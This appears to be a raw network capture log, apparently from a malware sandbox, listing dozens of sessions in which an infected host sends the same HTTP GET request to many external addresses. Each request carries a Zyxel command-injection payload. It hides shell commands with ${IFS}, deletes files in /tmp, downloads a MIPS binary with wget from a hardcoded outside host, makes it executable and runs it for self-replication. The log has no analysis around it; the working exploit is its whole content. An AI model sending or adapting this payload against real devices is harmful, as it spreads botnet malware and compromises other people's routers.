                                      Jan 14, 2024 15:50:53.461378098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6033192.168.2.1447112161.138.234.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461416006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6034192.168.2.1456924204.13.224.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461472988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6035192.168.2.1434420162.206.19.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461491108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6036192.168.2.1435218217.54.203.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461535931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6037192.168.2.145763849.83.214.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461572886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6038192.168.2.144552820.217.183.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461616993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6039192.168.2.1441026170.15.219.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461656094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6040192.168.2.14360881.131.185.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461672068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6041192.168.2.1460548101.186.80.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461716890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6042192.168.2.1460400205.190.13.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461755037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6043192.168.2.1460938142.45.43.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461790085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6044192.168.2.1460870189.171.251.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461849928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6045192.168.2.1437852218.61.129.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461879969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6046192.168.2.1456774220.253.182.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461901903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6047192.168.2.14592081.81.246.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461936951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6048192.168.2.144095814.26.111.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461996078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6049192.168.2.144591476.37.7.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462028027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6050192.168.2.143447254.100.198.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462091923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6051192.168.2.1434934165.210.79.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462105989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6052192.168.2.144617091.169.94.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462140083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6053192.168.2.1449828186.33.159.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462176085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6054192.168.2.145341850.71.10.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462229013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6055192.168.2.145257048.52.205.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462279081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6056192.168.2.146058623.216.241.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462307930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6057192.168.2.1458004116.33.183.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462336063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6058192.168.2.14546509.118.233.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462383032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6059192.168.2.144582680.163.4.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462424040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6060192.168.2.1447694181.197.160.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462450981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6061192.168.2.143807219.163.173.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462505102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6062192.168.2.1445952186.76.160.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462538004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6063192.168.2.1440964177.89.66.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462590933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6064192.168.2.144492477.106.2.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462611914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6065192.168.2.143813879.111.41.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462667942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6066192.168.2.144710439.170.22.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462702990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6067192.168.2.1456674134.41.155.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462749004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6068192.168.2.143925440.37.13.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462786913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6069192.168.2.144170286.224.182.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462836981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6070192.168.2.145761252.191.23.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462872028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6071192.168.2.143970681.209.75.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462919950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6072192.168.2.144205449.88.120.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.462944984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6073192.168.2.1459896164.238.100.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463009119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6074192.168.2.1450954222.142.24.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463009119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6075192.168.2.1457178209.128.2.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463049889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6076192.168.2.1454878135.98.223.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463097095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6077192.168.2.1453600160.166.72.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463188887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6078192.168.2.145767245.62.130.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463258982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6079192.168.2.1435700182.69.126.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463315964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6080192.168.2.1434684168.126.75.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463363886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6081192.168.2.1436134170.243.97.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463465929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6082192.168.2.1443198174.77.159.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463510036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6083192.168.2.1433490179.100.97.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463547945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6084192.168.2.1441996196.199.216.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463582039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6085192.168.2.1437936172.46.185.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463622093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6086192.168.2.1446016218.244.36.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463659048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6087192.168.2.1436638147.111.93.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463701963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6088192.168.2.1447834222.199.120.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463732004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6089192.168.2.1452650191.248.32.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463784933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6090192.168.2.1449860187.238.178.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463810921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6091192.168.2.1447588120.119.88.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463841915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6092192.168.2.145145857.11.146.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463895082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6093192.168.2.1441980210.228.102.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463895082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6094192.168.2.1444774206.236.160.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463896036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6095192.168.2.1439318167.24.82.21443
                                      TimestampBytes transferredDirectionData
